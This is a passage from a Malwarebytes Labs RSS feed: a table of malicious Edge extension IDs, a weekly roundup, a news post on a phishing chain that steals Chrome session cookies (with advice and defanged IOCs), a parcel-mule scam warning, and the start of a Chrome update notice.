<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><td><strong>Extension Name</strong></td><td><strong>Extension ID</strong></td></tr></thead><tbody><tr><td>#Best# PDF Saver</td><td>jebcdimkcimkafekgbgbhookdajcoeib</td></tr><tr><td>&#8220;Download&#8221; Button for YouTube</td><td>jbmkcmhocoddcokjkahpcchanlmiffhg</td></tr><tr><td>&#8220;Save&#8221; Button for Pinterest</td><td>fhkijdlfjnpimenfpnegkecbbijmoipm</td></tr><tr><td>&#8230;Page Screenshot Clipper</td><td>maiackahflfnegibhinjhpbgeoldeklb</td></tr><tr><td>7TV</td><td>nmhdjlflloeeahacgomilnhmpfnhlpkn</td></tr><tr><td>Adblock</td><td>aooacabidfijofopjaeligonlfobjcjb</td></tr><tr><td>Adblock</td><td>dckihkcdmjmlkndgmmgplpcnkmdpangb</td></tr><tr><td>Adblock (µBlock clone)</td><td>kmiahfbflcnmlobepelpgkmolhodmiek</td></tr><tr><td>Adblock For Edge</td><td>kikacehfccglblphddbifmiaeiglfdfi</td></tr><tr><td>Adblock Master</td><td>dgmpkflgbcbpjgniahjegbpelmofbgnn</td></tr><tr><td>Adblock Master</td><td>hninibdhkeepfndhcdknlijeapngbgdp</td></tr><tr><td>Adblock Master for Youtube</td><td>jnakfjmfmjmfpmdnghedafdphdanbjkh</td></tr><tr><td>Adblock for Youtube</td><td>afakckepbbffmnoghgpfnnebijeahjcb</td></tr><tr><td>Adblock for Youtube</td><td>gclhifbbggfamoojmienffegbmmfnfll</td></tr><tr><td>Adblock for Youtube<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em;max-height: 1em" /></td><td>nipggfgilmoiofmnkbeabghbcaohmjih</td></tr><tr><td>Adblocker FX</td><td>fkkoeecbjckjpnmenebojblcljjgbpoj</td></tr><tr><td>Adblocker Plus for YouTube<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em;max-height: 1em" /></td><td>imiheoejheaebigkjaeilfmekiikjdbd</td></tr><tr><td>AdFly Skipper for Edge</td><td>nhfohdhgahjpmniccbgflilignkcnmai</td></tr><tr><td>AdSkip-爱奇艺</td><td>mimmainmmkddahakleojidjaimaofndp</td></tr><tr><td>Ads Block Ultimate</td><td>fbobegkkdmmcnmoplkgdmfhdlkjfelnb</td></tr><tr><td>AI Search GPT for Edge</td><td>beemogkfhphmjghmkghdaggidgohohee</td></tr><tr><td>AI Search with ChatGPT</td><td>jgngkchljnldpnjimaboboomjmpfpoie</td></tr><tr><td>AI Weather Forecast</td><td>iaehhmhmdidpkfmddiodkloefndpggcj</td></tr><tr><td>AliExpress Helper</td><td>elecjoakfjcmjoppfconlfgfemjcaoea</td></tr><tr><td>Auto Skip Ads on YouTube</td><td>dcelinkcepeidliddjhapgjokheoldjb</td></tr><tr><td>Axure RP Viewer</td><td>aekfeebhjlmielppjlhebapokdkelion</td></tr><tr><td>Batch Image Downloader</td><td>hnleilhpfbdofpdnnpjggafhncienakg</td></tr><tr><td>Batch Image Downloader</td><td>ibfjnghdeenopfkpbmnkablkfejnlnif</td></tr><tr><td>Best Speedtest Tool</td><td>eklcgjodcnhhcghpbhehhbnmjncbopcg</td></tr><tr><td>Best YouTube Adblocker</td><td>cjjcndlebdepeddfopnhpifmbfecocfh</td></tr><tr><td>Color Enhancer</td><td>bmmchpeggdipgcobjbkcjiifgjdaodng</td></tr><tr><td>Color by Number</td><td>aljmdjbcbkanlhnmcdjbefaomgbekhno</td></tr><tr><td>ColorZilla</td><td>mdjeohcdegpfoppocljbccpognjlkjke</td></tr><tr><td>Convert Everything</td><td>ielbkcjohpgmjhoiadncabphkglejgih</td></tr><tr><td>Cool Cursor</td><td>ajbkmeegjnmaggkhmibgckapjkohajim</td></tr><tr><td>CrxMouse &#8211; Super Drag</td><td>pohfogacehhgefhgmcmnojflfakllkal</td></tr><tr><td>CrxMouse Gestures</td><td>imcbcfmohachfahkbgijokokjpfmoogb</td></tr><tr><td>Custom New Tab for Edge</td><td>dbhgpbaaedlknnnochmkjfacnfnakkfa</td></tr><tr><td>Downloader for Instagram</td><td>higdalghhdbfffdjdiaenminajlmmldb</td></tr><tr><td>Download All Images</td><td>hnggnhinapdcjocbciajaffnofecfale</td></tr><tr><td>Edge Web Highlighter</td><td>ijgobfhjjipoljjcejmafocdnfnloflm</td></tr><tr><td>Efficient Adblocker for Youtube</td><td>oejbpnadmkdiofacgknaaagbmmonhgpb</td></tr><tr><td>Enhance YouTube<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em;max-height: 1em" /></td><td>jecnjeedhbokmpckobjbgieglfjcomek</td></tr><tr><td>Evernote in Pinned Tab</td><td>elljfaejhdaplocgcejlhfemgimbmcdp</td></tr><tr><td>Focus To-Do: Pomodoro Timer &amp; To Do List</td><td>nlapjaaepfeadiecaipnacimidfjginj</td></tr><tr><td>Free Online Video Downloader</td><td>bpdanoaacmebjgfjdmekfcfgmnaoekim</td></tr><tr><td>G.B.B.D Translator</td><td>fdjpommjpahieenehallhicdhponhacm</td></tr><tr><td>GIPHY for Edge</td><td>gggjlnkbmgmjboipaegjmjmehmcekamo</td></tr><tr><td>Gmail Checker</td><td>nhjdhmbdahdidccpobobccagmmijndmp</td></tr><tr><td>Google Hangouts</td><td>adnahjjfjjemdiefpobclponnhkijnmo</td></tr><tr><td>Google search link fix</td><td>mjofmhcbolkekhebpccldlbdamnfjefc</td></tr><tr><td>Google Translate in Right Click</td><td>fcoongackakfdmiincikmjgkedcgjkdp</td></tr><tr><td>Hiddence VPN</td><td>akfklmfpgmkkhiiolnfbhalkeccjnmeb</td></tr><tr><td>HLS Stream Downloader</td><td>fgbfcndckldbjifhjgijpjmnpekkelkb</td></tr><tr><td>IG Downloader for Edge</td><td>ncbpkjcnklnbnkjpcamhhoedlkljeolo</td></tr><tr><td>Image Downloader &#8211; Batch Download</td><td>ngeoikidkjbegoifbnmfimacmbilfcgi</td></tr><tr><td>Image Downloader Pro</td><td>gnbnbmnldhfoplgjojhepikgjanaplle</td></tr><tr><td>Imageye</td><td>ikfdcmchafnmklcndfegdlefcfoaggni</td></tr><tr><td>ImTranslator</td><td>bbofakpgfmlfjpjcahodgpbddocpibge</td></tr><tr><td>iQiyi Adblock</td><td>hlkenllnegiplhjhpobgangolfkjcgab</td></tr><tr><td>iVideo Downloader</td><td>amfboegfahhedgehddflgcfbdaapllfj</td></tr><tr><td>iYouTubeToMP4</td><td>bemebcpaekkmffjjbdakpipemmmlgchb</td></tr><tr><td>Language Reactor</td><td>hffpfdhdjpbnaddaidajedimmpckekkl</td></tr><tr><td>Live Start Page</td><td>egbkgelnkodaldbpkgjmhcekjakkcpnk</td></tr><tr><td>Magic Actions for YouTube</td><td>pjhoiegecdlpaohfffpajaldpbilngog</td></tr><tr><td>Marinara: Pomodoro® Assistant</td><td>mebgpfbaibhepnkljpimlijicgkbangk</td></tr><tr><td>Mouse Tooltip Translator</td><td>ibjjllhemkfgfbkgohldepcdgiigpdkb</td></tr><tr><td>Natural Reader Text to Speech</td><td>eopjamlpanhfkcbnoeofcnmdfdiogfgl</td></tr><tr><td>New Tab &#8211; Customized Dashboard</td><td>edohfgmjmdnibeihfcajfclmhapjkooa</td></tr><tr><td>Night Mode</td><td>engcfdjknekakgpjkhdobneidcpfbfgm</td></tr><tr><td>Night Mode</td><td>pgcamkdibinodcpkhenjmofbfobpebpn</td></tr><tr><td>One Key Translate</td><td>jihipmfmicjjpbpmoceapfjmigmemfam</td></tr><tr><td>Picture-in-Picture Playing</td><td>kemjiblbeciejjlgobbkffbpnceieefh</td></tr><tr><td>Piggy &#8211; Automatic Coupons</td><td>gmaoimcaoimgmomockloieoifjocpkmf</td></tr><tr><td>Pinterest Save Button</td><td>kakgeonhimhojdncehlopejkfaapboeo</td></tr><tr><td>Return YouTube Dislike</td><td>cgoigjefilgfmcjnnendlpdaonlfoncf</td></tr><tr><td>RSS Feed</td><td>gmciomcaholgmklbfangdjkneihfkddd</td></tr><tr><td>Save as PDF</td><td>mlgefgipndlgdfjfgnjfheigkagjieea</td></tr><tr><td>Save Pinterest on Right Click</td><td>glgbgppjjkldoifgpbhbpbkbcdjpgpfj</td></tr><tr><td>Screen Shader | Dark Mode</td><td>olcibgopfmndlnghnmogcgdhdffdbicg</td></tr><tr><td>Similar Sites &#8211; Discover Related Websites</td><td>fifeankddgioinbcchlokclbcgjlopjj</td></tr><tr><td>Similar Sites for Edge</td><td>fhhinoefbjlmhakpjohnpabdobgmphli</td></tr><tr><td>Simple mass downloader</td><td>dbhdfkiddhdhmcikjdgblfjbenjfjlfh</td></tr><tr><td>Social Book Post Manager</td><td>inelenlaldjofeekhjinpjkacjokagke</td></tr><tr><td>SpeakIt!</td><td>badiigfpcpfckbhmpmkhokagppaadkim</td></tr><tr><td>Speed Control for Youtube</td><td>eindenipbnkpeofhpjjimphfchmjoohe</td></tr><tr><td>Spell &amp; Grammar Check Tool</td><td>fljmegmgjebjdionedkjfgffikhnmcgg</td></tr><tr><td>ssYoutube &#8211; Video Downloader</td><td>okmfpehbgckbneedidbladdaiekikcdo</td></tr><tr><td>Summary with ChatGPT</td><td>dokiamnhbobapjfhhhcjlfplabeofamp</td></tr><tr><td>Super Dark Mode for Edge</td><td>lkmeakjjodlkhbikbpdoeicfodaklkna</td></tr><tr><td>TikMate</td><td>jhahljcmjemimhchigiaigklabnpodgo</td></tr><tr><td>TikTok APP for Edge</td><td>celdediiemogjpfcjocdbildilkccepl</td></tr><tr><td>TikTok Downloader Without Watermark</td><td>flcgalphjnojjefjnnimnejbkkefbjgo</td></tr><tr><td>To QRcode</td><td>cgjomicbgmoadggnjbdiafpjlodmafkp</td></tr><tr><td>Transkriptor</td><td>lplondnihmdhjokafldkcfnjclkhigpm</td></tr><tr><td>Translate Officer</td><td>jjdfciihihcpgfgmoonfpgglbgclpfai</td></tr><tr><td>Translate Selected Text with Google</td><td>obocpangfamkffjllmcfnieeoacoheda</td></tr><tr><td>Translate Selected Text with Right Click</td><td>fmchencccolmmgjmaahfhpglemdcjfll</td></tr><tr><td>Trusted VPN for Edge &#8211; Free VeePN</td><td>klmfgbnlbfgpdenpdddpdfigmnkmchil</td></tr><tr><td>Turbo Download Manager</td><td>bpjnmlookdfciblphehedlcbpmignahe</td></tr><tr><td>Twitch Custom Emotes &#8211; FrankerFaceZ</td><td>johcbgkljdbebbloakcollpmigpigkpd</td></tr><tr><td>U-Tube Downloader</td><td>nphphgkcccnlmdiihcedabnhfacfmojk</td></tr><tr><td>Undo Closed Tabs</td><td>amemnenomfejhfmfiheekmbcigfkolel</td></tr><tr><td>Unblock Youku</td><td>ajnjfpjimckjhfcpkaldennpdjglmeml</td></tr><tr><td>UseChatGPT.AI</td><td>hcmfdagipflbaagmcnhnhabkmjkopcke</td></tr><tr><td>Video &amp; MP3 Downloader</td><td>oiolhdeinoaidggfcpebifcbedppbgog</td></tr><tr><td>Video Downloader Premium</td><td>jgphopeamnghlcekffldkpnbhmiadnbc</td></tr><tr><td>VPN</td><td>pdnjhppcgkdbjolbeplcabkcfmpnbjmh</td></tr><tr><td>Weather Forecast</td><td>hecicojipmfmablnbhknedademofbbpk</td></tr><tr><td>Webpage Screenshot for Edge</td><td>eblienbdkbgiigaebhmljbedkafiobkj</td></tr><tr><td>YouTube Transcript to Text</td><td>nfincgjfplibcdcncfkeehldffppnlnp</td></tr><tr><td>YouTube<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em;max-height: 1em" /> Adblock Plus</td><td>flmkfmdmcaepdaoedepihfkhmgopiago</td></tr><tr><td>Youtube Adblock Online</td><td>hmjdegfgppjddmmojloflajkelegnjdp</td></tr><tr><td>Youtube Download</td><td>dhnibdhcanplpdkcljgmfhbipehkgdkk</td></tr><tr><td>Youtube To MP4 Downloader</td><td>cfilkckedhoniijcpjfgihelgepflpni</td></tr><tr><td>ZLibrary Searcher</td><td>ffedaeoanbhgmanhhecfjodpopcjnhkc</td></tr><tr><td>一键翻译</td><td>nepdfkaidpemglngbgpnmmhnleiekpin</td></tr><tr><td>鼠标手势 (Mouse Gestures)</td><td>cbopgngpbfeoecnbebghbbhmdadmllce</td></tr></tbody></table></figure>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/119-edge-extensions-promised-useful-tools-instead-downloaded-malware</link>
			<pubDate>Mon, 29 Jun 2026 14:41:18 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/119-edge-extensions-promised-useful-tools-instead-downloaded-malware</guid>
		</item>
				<item>
			<title><![CDATA[ A week in security (June 22 &#8211; June 28) ]]></title>
			<description><![CDATA[ A list of topics we covered in the week of June 22 to June 28 of 2026 ]]></description>
								<category>News</category>
										<category><![CDATA[ chrome ]]></category>
										<category><![CDATA[ GTA 6 ]]></category>
										<category><![CDATA[ Pixelsmash ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Last week on Malwarebytes Labs:</p>



<ul class="wp-block-list">
<li><a href="/blog/news/2026/06/malware-steals-chrome-session-cookies-to-take-over-your-accounts">Malware steals Chrome session cookies to take over your accounts</a></li>



<li><a href="/blog/scams/2026/06/beware-of-parcel-expert-job-offers-theyre-parcel-mule-scams">Beware of &#8220;Parcel Expert&#8221; job offers: They’re parcel mule scams</a></li>



<li><a href="/blog/news/2026/06/update-chrome-to-patch-critical-browser-security-flaws">Update Chrome to patch critical browser security flaws</a></li>



<li><a href="/blog/threat-intel/2026/06/fake-domain-renewal-emails-trick-website-owners-into-paying-scammers">Fake domain renewal emails trick website owners into paying scammers</a></li>



<li><a href="/blog/privacy/2026/06/elite-network-says-it-was-hacked-after-members-personal-data-was-left-exposed">Elite network says it was hacked after members’ personal data was left exposed</a></li>



<li><a href="/blog/news/2026/06/pixelsmash-flaw-turns-video-files-into-attack-tools">PixelSmash flaw turns video files into attack tools</a></li>



<li><a href="/blog/scams/2026/06/watch-out-for-renewal-scams-pretending-to-be-malwarebytes">Watch out for renewal scams pretending to be Malwarebytes</a></li>



<li><a href="/blog/scams/2026/06/total-access-to-all-your-devices-sextortion-scammers-strike-again">&#8220;Total access to all your devices.&#8221; Sextortion scammers strike again</a></li>



<li><a href="/blog/threat-intel/2026/06/inside-the-dark-web-stolen-identities-for-95¢-malware-and-scams-for-hire">Inside the dark web: Stolen identities for 95¢, malware, and scams-for-hire</a></li>



<li><a href="/blog/news/2026/06/meta-pauses-controversial-employee-tracking-program-after-security-review">Meta pauses controversial employee-tracking program after security review</a></li>



<li><a href="/blog/data-breaches/2026/06/hackers-steal-passport-and-drivers-license-data-of-3-million-texans">Hackers steal passport and driver’s license data of 3 million Texans</a></li>



<li><a href="/blog/threat-intel/2026/06/gta-6-early-access-is-nothing-but-a-scam">GTA 6 early access is nothing but a scam</a></li>



<li><a href="/blog/news/2026/06/thousands-of-d-link-routers-under-control-of-arystinger-botnet">Thousands of D-Link routers under control of AryStinger botnet</a></li>



<li><a href="/blog/scams/2026/06/document-delivery-scams-what-are-they-and-whats-their-goal">Document delivery scams: What are they and what’s their goal?</a></li>



<li><a href=""></a></li>
</ul>



<p class="wp-block-paragraph">Stay safe!</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>Browse like&nbsp;no one&#8217;s&nbsp;watching.</strong>&nbsp;</p>



<p class="wp-block-paragraph">Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read&nbsp;doesn&#8217;t&nbsp;have to feel personal.&nbsp;<a href="https://www.malwarebytes.com/vpn" target="_blank" rel="noreferrer noopener">Try it free →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/a-week-in-security-june-22-june-28</link>
			<pubDate>Mon, 29 Jun 2026 07:01:00 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/a-week-in-security-june-22-june-28</guid>
		</item>
				<item>
			<title><![CDATA[ Malware steals Chrome session cookies to take over your accounts ]]></title>
			<description><![CDATA[ A phishing campaign installs a malicious Chrome extension to hijack browser sessions and compromise Windows devices. ]]></description>
								<category>News</category>
										<category>Privacy</category>
										<category><![CDATA[ Chrome Extension ]]></category>
										<category><![CDATA[ powershell ]]></category>
										<category><![CDATA[ session cookies ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">An email attachment leads to the installation of a malicious Chrome extension. <a href="https://www.d3lab.net/breaking-out-of-chromes-sandbox-a-native-messaging-backdoor-observed-in-italy/">Researchers</a> say it is part of a Windows backdoor delivered via a phishing email. The malware abuses Chrome Native Messaging to move control from the browser into the host system. Its most notable trick isn&#8217;t the phishing lure itself, but the way it uses legitimate browser and Windows features to run PowerShell and collect data while staying inside expected workflows.</p>



<p class="wp-block-paragraph">The attack starts with an email attachment disguised as a PDF. The file uses the misleading extension <code>.pfd.js</code> to look like a PDF document, but it&#8217;s actually an obfuscated JavaScript file that drops additional files into the temporary folder and starts the rest of the infection chain.</p>



<p class="wp-block-paragraph">As part of that chain, a PowerShell script prepares a Chrome extension and changes Chrome policy settings so that the extension can be installed. The malware makes the installation appear to be an administrator-controlled deployment rather than a normal extension installation.</p>



<p class="wp-block-paragraph">Once active, the extension and its native companion collect browser cookies, open tabs, URLs, language settings, and fingerprinting data. The operators also use the setup as a remote command channel, sending instructions that can launch PowerShell and enumerate the contents of the <code>C: </code>drive.</p>



<p class="wp-block-paragraph">With the stolen  authenticated session cookies, the attackers can hijack active browser sessions rather than just stealing passwords, which is <a href="https://www.malwarebytes.com/blog/news/2024/11/warning-hackers-could-take-over-your-email-account-by-stealing-cookies-even-if-you-have-mfa" target="_blank" rel="noreferrer noopener">more useful</a> to them as it lets them access accounts already logged in on the victim’s browser, bypassing <a href="https://www.malwarebytes.com/cybersecurity/basics/2fa" target="_blank" rel="noreferrer noopener">multi-factor authentication (MFA)</a>.</p>



<p class="wp-block-paragraph">The most interesting aspect of the attack is its abuse of Chrome Native Messaging as a bridge between the browser sandbox and the operating system. Chrome allows extensions to communicate with a registered native host, and the attackers weaponized that legitimate feature to make the extension a controller for local code execution. The extension doesn’t launch PowerShell directly. Instead, it sends messages to the native host, which then launches or interacts with PowerShell on the host system.</p>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">The first line of defense against attacks of this kind is to avoid opening email attachments unless you can verify the sender. In addition:</p>



<ul class="wp-block-list">
<li>Always check the real file extension instead of relying on the displayed filename.</li>



<li>Use an up-to-date, real-time anti-malware solution to detect and block malicious activity.</li>



<li>Check the installed Chrome extensions on your device and remove any you don&#8217;t recognize or no longer use. </li>



<li>To be extra cautious, sign out of important accounts when you&#8217;re finished. That invalidates your session, so even if someone has stolen your session cookie, they won&#8217;t be able to use it to access your account.</li>



<li>Regularly check the login history for important accounts. Many online services let you see which devices have signed in, when, and from where.</li>
</ul>



<h2 id="h-iocs" class="wp-block-heading">IOCs</h2>



<p class="wp-block-paragraph"><strong>Attachment:</strong></p>



<p class="wp-block-paragraph"><code>Fattura-2819889242.pfd.js</code> (displayed as <code>Fattura-26189991026.pdf</code>)</p>



<p class="wp-block-paragraph"><strong>Malicious files:</strong></p>



<p class="wp-block-paragraph"><code>client_124578.exe<br>d3d11.dll</code></p>



<p class="wp-block-paragraph"><strong>Chrome extension:</strong></p>



<p class="wp-block-paragraph">Name: <code>Cloud vn105rkj64</code><br>ID: <code>gghagmhimhgfeajfdmjkgmmehbokmglg</code></p>



<p class="wp-block-paragraph"><strong>Domain:</strong></p>



<p class="wp-block-paragraph"><code>ext2[.]info</code></p>



<p class="wp-block-paragraph">This is blocked by <a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Malwarebytes Browser Guard</a>, our free browser extension that blocks ads, trackers, malware, and more.</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="911" height="715" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/ext2infoblock.png" alt="Browser Guard blocks ext2[.]info" class="wp-image-430362" /><figcaption class="wp-element-caption">Browser Guard blocks ext2[.]info</figcaption></figure>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/malware-steals-chrome-session-cookies-to-take-over-your-accounts</link>
			<pubDate>Fri, 26 Jun 2026 12:44:01 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/malware-steals-chrome-session-cookies-to-take-over-your-accounts</guid>
		</item>
				<item>
			<title><![CDATA[ Beware of &#8220;Parcel Expert&#8221; job offers: They&#8217;re parcel mule scams ]]></title>
			<description><![CDATA[ Most parcel mule scams start with fake job offers that trick victims into handling stolen goods. ]]></description>
								<category>Scams</category>
										<category>Threat Intel</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">A parcel mule scam, also called a reshipping scam, is a fake job offer designed to recruit people into handling stolen goods.</p>



<p class="wp-block-paragraph">It usually starts with a fake remote job offer that promises easy money for receiving, inspecting, repackaging, and forwarding packages from home. The “employer” may claim to be connected to familiar companies, but the real purpose is to move goods bought with stolen payment information so they are harder to trace. Victims often think they are doing routine logistics work, but they are actually helping criminals launder stolen merchandise.</p>



<p class="wp-block-paragraph">Targets get “recruited” to work from home for shipping companies or retailers. Scammers reach them by email, direct messages on social media, WhatsApp, and any other channel they can think of. One job title that appears frequently is “Parcel Expert.”</p>



<p class="wp-block-paragraph">Let’s look at an example received unsolicited on WhatsApp:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Hi! I hope you’re doing well.<br>My name is Elena from the Logistics Department. We reviewed your profile and would like to offer you a position as a Parcel Expert. This is a remote part-time opportunity with flexible hours and a monthly income of up to $5,300.<br>Your main duties will be: receiving packages at your home address, checking items against invoices, taking photos if needed, preparing documents, and forwarding the parcels to our distribution hubs. In some cases, you may be asked to send urgent orders directly to international destinations.</p>



<p class="wp-block-paragraph">We work with well-known retailers, including Amazon, Best Buy, Walmart, and Zappos, so the process is simple and safe. No experience is necessary, and we provide full instructions.</p>



<p class="wp-block-paragraph">Please reply ‘interested’ if you would like to proceed, and we will send you the onboarding details.”</p>
</blockquote>



<p class="wp-block-paragraph">It follows the classic pattern closely: high pay for low-skill, home-based work, packages sent to a private address, and a requirement to forward items to hubs or international destinations. The mention of well-known retailers like Amazon, Best Buy, and Walmart is also a common trust signal scammers use to make the offer sound legitimate.</p>



<h2 id="h-how-to-recognize-parcel-mule-scams" class="wp-block-heading">How to recognize parcel mule scams</h2>



<p class="wp-block-paragraph">All I really need to do here is quote the Malwarebytes <a href="https://www.malwarebytes.com/solutions/scam-guard" target="_blank" rel="noreferrer noopener">Scam Guard</a> analysis:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph"><strong>Red flags identified</strong></p>



<p class="wp-block-paragraph">The companies mentioned in the scams vary by location. For example, a German target was “recruited” to work for DHL, a Spanish customer got an offer for Mercado, and a US victim received one for Freight Metro. But it’s mostly the big global names like Amazon, FedEx, and retailers like Best Buy, AliExpress, and Walmart.</p>



<ol class="wp-block-list">
<li><strong>Work from home shipping packages</strong>: Legitimate companies do not ship high-value goods to the private home address of someone they just hired online, especially for work-from-home roles.</li>



<li><strong>Payment promises seem too good to be true</strong>: $4,400 base salary plus performance bonuses for unskilled logistical work is extremely unrealistic, especially for remote roles with no experience required.</li>



<li><strong>Handling of items from retailers</strong>: Fraud rings commonly use stolen credit card info to order goods sent to recruited &#8220;mules&#8221; (victims) who unknowingly forward them, making tracing harder for law enforcement.</li>



<li><strong>International reshipping</strong>: Legitimate logistics companies use professional hubs—they do not ask new hires to ship internationally directly from their homes.</li>



<li><strong>Personal risk</strong>: You may become involved in <strong>credit card fraud</strong> and have law enforcement contact you, as your home address will be connected to the receipt and shipping of stolen goods.</li>



<li><strong>Typical language patterns</strong>: The description is nearly identical to those used by scammers globally.</li>
</ol>
</blockquote>



<h2 id="h-what-are-the-risks" class="wp-block-heading">What are the risks</h2>



<p class="wp-block-paragraph">The most obvious risk is wasting your time on a job you&#8217;ll never get paid for. But there are others:</p>



<ul class="wp-block-list">
<li>Scammers may ask for personal documents, increasing the risk of fraud and <a href="https://www.malwarebytes.com/identity-theft" target="_blank" rel="noreferrer noopener">identity theft</a> if they collect IDs, banking details, or other sensitive data during the &#8220;onboarding&#8221; process.</li>



<li>Victims can become suspects or persons of interest if authorities trace stolen goods back to them.</li>



<li>Criminals know you are vulnerable and will try to take advantage of you again.</li>
</ul>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">Recognizing scams for what they are is the best protection, so keep reading our blog.</p>



<ul class="wp-block-list">
<li>The most important rule for all types of scams is simple: <strong>Do not interact</strong>. Not even for fun or to waste the scammers&#8217; time. It takes a lot of preparation to do that safely.</li>



<li><strong>Verify the company</strong> independently, search for complaints or <a href="https://www.bbb.org/scamtracker" target="_blank" rel="noreferrer noopener nofollow">scam reports</a>, and be skeptical of any offer that is unusually vague or highly paid.</li>



<li><strong>Do not share</strong> identity documents, your home address, phone number,  or bank details.</li>



<li><strong>Be cautious of any role that requires upfront payments or fees to get started</strong>. While some legitimate franchise or business opportunities involve investment, they should be transparent, well-documented, and independently verifiable.</li>



<li>Be aware that <strong>receiving and forwarding stolen goods</strong> is illegal and could implicate you in a crime.</li>



<li><strong>Report the incident</strong> to the proper authorities. In the US, report it to the <a href="https://reportfraud.ftc.gov/" target="_blank" rel="noreferrer noopener nofollow">FTC</a>.</li>
</ul>



<p class="wp-block-paragraph"><strong>Pro tip:</strong> Malwarebytes <a href="https://www.malwarebytes.com/solutions/scam-guard" target="_blank" rel="noreferrer noopener">Scam Guard</a> identified this scam for what it is and will advise users on how to proceed.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<h3 class="wp-block-heading" id="h-something-feel-off-check-it-before-you-click-nbsp-nbsp"><strong>Something feel off? Check it before you click.&nbsp;</strong>&nbsp;</h3>



<p class="wp-block-paragraph"><strong>Malwarebytes Scam Guard</strong>&nbsp;helps you&nbsp;analyze&nbsp;suspicious links, texts, and screenshots instantly.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">Available with&nbsp;<a href="https://www.malwarebytes.com/premium" target="_blank" rel="noreferrer noopener">Malwarebytes Premium Security</a>&nbsp;for all your devices, and in the&nbsp;<a href="https://www.malwarebytes.com/mobile" target="_blank" rel="noreferrer noopener">Malwarebytes app for iOS and Android</a>.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/solutions/scam-guard" target="_blank" rel="noreferrer noopener">Try it free →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/scams/2026/06/beware-of-parcel-expert-job-offers-theyre-parcel-mule-scams</link>
			<pubDate>Thu, 25 Jun 2026 18:12:51 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/scams/2026/06/beware-of-parcel-expert-job-offers-theyre-parcel-mule-scams</guid>
		</item>
				<item>
			<title><![CDATA[ Update Chrome to patch critical browser security flaws ]]></title>
			<description><![CDATA[ Chrome has patched 18 vulnerabilities, including four critical flaws. Two WebGL bugs could allow attackers to escape the browser's security sandbox. ]]></description>
								<category>Bugs</category>
										<category>News</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Google <a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0482630350.html" target="_blank" rel="noreferrer noopener nofollow">released</a> a security update for Chrome that fixes 18 vulnerabilities, including four rated Critical. There is no indication that any of these newly patched bugs are being actively exploited in the wild.</p>



<p class="wp-block-paragraph">The stable channel has been updated to 149.0.7827.196/197 for Windows and Mac and 149.0.7827.196 for Linux. The update will roll out over the coming days and weeks. Chrome for Android was also <a href="https://chromereleases.googleblog.com/2026/06/chrome-for-android-update_01705291676.html" target="_blank" rel="noreferrer noopener nofollow">recently updated</a> to 149.0.7827.197.</p>



<h2 id="h-how-to-update-chrome" class="wp-block-heading">How to update Chrome</h2>



<p class="wp-block-paragraph">If you don’t want to wait for the rollout to reach you, manually updating is easy.</p>



<p class="wp-block-paragraph">The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you never close your browser or if something goes wrong, such as an extension preventing the update.</p>



<p class="wp-block-paragraph">To update manually, click the&nbsp;<strong>More</strong>&nbsp;menu (three dots),&nbsp;then&nbsp;go to&nbsp;<strong>Settings</strong>&nbsp;&gt;&nbsp;<strong>About Chrome</strong>. If an update is available, Chrome will start downloading it automatically. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.</p>



